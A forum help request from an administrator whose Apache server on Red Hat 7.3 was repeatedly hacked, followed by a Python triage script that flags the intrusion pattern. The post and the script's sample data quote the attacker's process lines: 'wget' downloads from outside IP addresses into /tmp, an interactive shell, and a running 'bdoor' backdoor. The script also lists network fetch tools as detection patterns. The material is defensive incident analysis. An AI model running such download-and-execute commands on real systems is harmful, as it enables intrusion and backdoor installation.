Server repeatedly hacked - writes and executes files from /tmp

My server has been compromised three times by the same hacker during the past 10 days. I did a re-kickstart last week and migrated from RH 7.1 to 7.3 on a fresh HDD; however, the same hacker has managed to intrude again and has followed the same pattern each time.

I notice the following files written in the /tmp folder by the hacker:
-rwxr-xr-x 1 apache apache 14817 Mar 8 12:02 bdoor
-rw-r--r-- 1 apache apache 1403 Feb 18 17:58 bdoor.c
-rwxr-xr-x 1 apache apache 128040 Mar 8 10:05 ssl

The following processes were running when I first noticed:

apache 18042 0.0 0.2 1888 856 ? S 10:57 0:00 sh -c cd /tmp;echo;wget http://200.140.13.250:80
apache 18079 0.0 0.2 1888 856 ? S 10:58 0:00 sh -c cd /tmp;echo;wget http://200.163.8.74:8080
apache 18087 25.0 0.3 2504 1304 ? R 10:58 18:01 -ash -i
apache 18232 0.0 0.0 1272 268 ? S 11:02 0:00 ./bdoor

I am on:
Red Hat Linux release 7.3 (Valhalla)
apache-1.3.27-2

We always keep shell access disabled, and PHP file_uploads = Off.

Also, the following SSL packages are there; I don't think I am using SSL, or that my server needs these:

mod_ssl-2.8.12-2
openssl096-0.9.6-13
openssl-0.9.6b-28
openssl-devel-0.9.6b-28
openssl095a-0.9.5a-18
openssl-perl-0.9.6b-28

I have no idea what the above files/processes would have done or how they have damaged my server.

The same hacker has been repeatedly intruding into my server. I think this is an SSL hole; my server provider is unable to fix this.

Please help ASAP.

Thanks,
Viv
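As an added example (not part of Viv's post, and not something that identifies the entry vector), here is a small Python triage script that applies the pattern visible in the listings above to captured `ps aux` and `ls -l /tmp` output: a web-server account spawning an interactive shell, `sh -c ... wget` one-liners staging into /tmp, a binary run from /tmp, and executables or C sources owned by apache sitting in /tmp. The process and file lines are the ones quoted in the post plus one constructed benign httpd line for contrast; the set of web-server account names, the rule names and the extra script suffixes are assumptions.

```python
"""Triage helper: flag the /tmp drop-and-execute pattern in ps/ls captures."""
import re
from typing import Dict, List, Tuple

# Assumed: accounts that should never spawn shells or execute out of /tmp.
WEB_USERS = {"apache", "www-data", "nobody", "httpd"}
SHELLS = {"sh", "bash", "ash", "dash", "ksh", "csh", "tcsh", "zsh"}
FETCHERS = re.compile(r"\b(wget|curl|lynx|fetch|ftp|tftp|nc|netcat)\b")
STAGING_DIRS = ("./", "/tmp/", "/var/tmp/", "/dev/shm/")

ProcFinding = Tuple[int, str, str]   # (pid, rule, command)
FileFinding = Tuple[str, str]        # (filename, rule)

# Constructed sample: the four ps lines quoted in the post, plus one benign httpd line.
PS_LINES = [
    "apache 18042 0.0 0.2 1888 856 ? S 10:57 0:00 sh -c cd /tmp;echo;wget http://200.140.13.250:80",
    "apache 18079 0.0 0.2 1888 856 ? S 10:58 0:00 sh -c cd /tmp;echo;wget http://200.163.8.74:8080",
    "apache 18087 25.0 0.3 2504 1304 ? R 10:58 18:01 -ash -i",
    "apache 18232 0.0 0.0 1272 268 ? S 11:02 0:00 ./bdoor",
    "apache 18300 0.0 0.5 9000 2100 ? S 11:05 0:00 /usr/sbin/httpd",  # constructed, benign
]

# Constructed sample: the three ls -l lines from /tmp quoted in the post.
LS_LINES = [
    "-rwxr-xr-x 1 apache apache 14817 Mar 8 12:02 bdoor",
    "-rw-r--r-- 1 apache apache 1403 Feb 18 17:58 bdoor.c",
    "-rwxr-xr-x 1 apache apache 128040 Mar 8 10:05 ssl",
]


def _shell_name(token: str) -> str:
    """'-ash' -> 'ash', '/bin/sh' -> 'sh' (a leading '-' marks a login shell)."""
    return token.lstrip("-").rsplit("/", 1)[-1]


def check_process(line: str) -> List[ProcFinding]:
    """Apply the rules to one 'ps aux' line (11 columns, COMMAND last)."""
    parts = line.split(None, 10)
    if len(parts) < 11:
        return []  # header or truncated line
    user, pid, cmd = parts[0], int(parts[1]), parts[10]
    if user not in WEB_USERS:
        return []
    findings: List[ProcFinding] = []
    argv = cmd.split()
    if _shell_name(argv[0]) in SHELLS:
        # Login shell ('-ash') or explicit '-i': a human typing as the web user.
        if argv[0].startswith("-") or "-i" in argv[1:]:
            findings.append((pid, "interactive shell as web user", cmd))
        # 'sh -c cd /tmp;...;wget ...': the download-and-stage one-liner.
        if "-c" in argv[1:] and ("/tmp" in cmd or FETCHERS.search(cmd)):
            findings.append((pid, "shell one-liner fetching/staging in /tmp", cmd))
    # './bdoor' or /tmp/x: executing a dropped binary from a world-writable dir.
    if argv[0].startswith(STAGING_DIRS):
        findings.append((pid, "binary executed from world-writable dir", cmd))
    return findings


def check_tmp_listing(line: str) -> List[FileFinding]:
    """One 'ls -l' line from /tmp: flag executables or sources owned by a web user."""
    parts = line.split(None, 8)
    if len(parts) < 9:
        return []
    mode, owner, name = parts[0], parts[2], parts[8]
    if owner not in WEB_USERS:
        return []
    findings: List[FileFinding] = []
    if "x" in mode[1:]:
        findings.append((name, "executable owned by web user in /tmp"))
    if name.endswith((".c", ".pl", ".sh", ".py")):  # assumed suffix list
        findings.append((name, "source/script dropped by web user"))
    return findings


def triage(ps_lines: List[str], ls_lines: List[str]) -> Dict[str, list]:
    """Run both checks and return every hit, keyed by source."""
    procs = [f for line in ps_lines for f in check_process(line)]
    files = [f for line in ls_lines for f in check_tmp_listing(line)]
    return {"processes": procs, "files": files}


if __name__ == "__main__":
    result = triage(PS_LINES, LS_LINES)
    for pid, rule, cmd in result["processes"]:
        print(f"PROC {pid:>6}  {rule:<45} {cmd}")
    for name, rule in result["files"]:
        print(f"FILE {name:>10}  {rule}")
```

On a live box, feed it `ps aux` and `ls -l /tmp /var/tmp /dev/shm` output rather than the embedded samples. A hit tells you the web-server account is running things it should not; it does not tell you which service let the attacker in, so the next step is correlating the process start times (10:57-11:02 here) against the httpd access and error logs for that window.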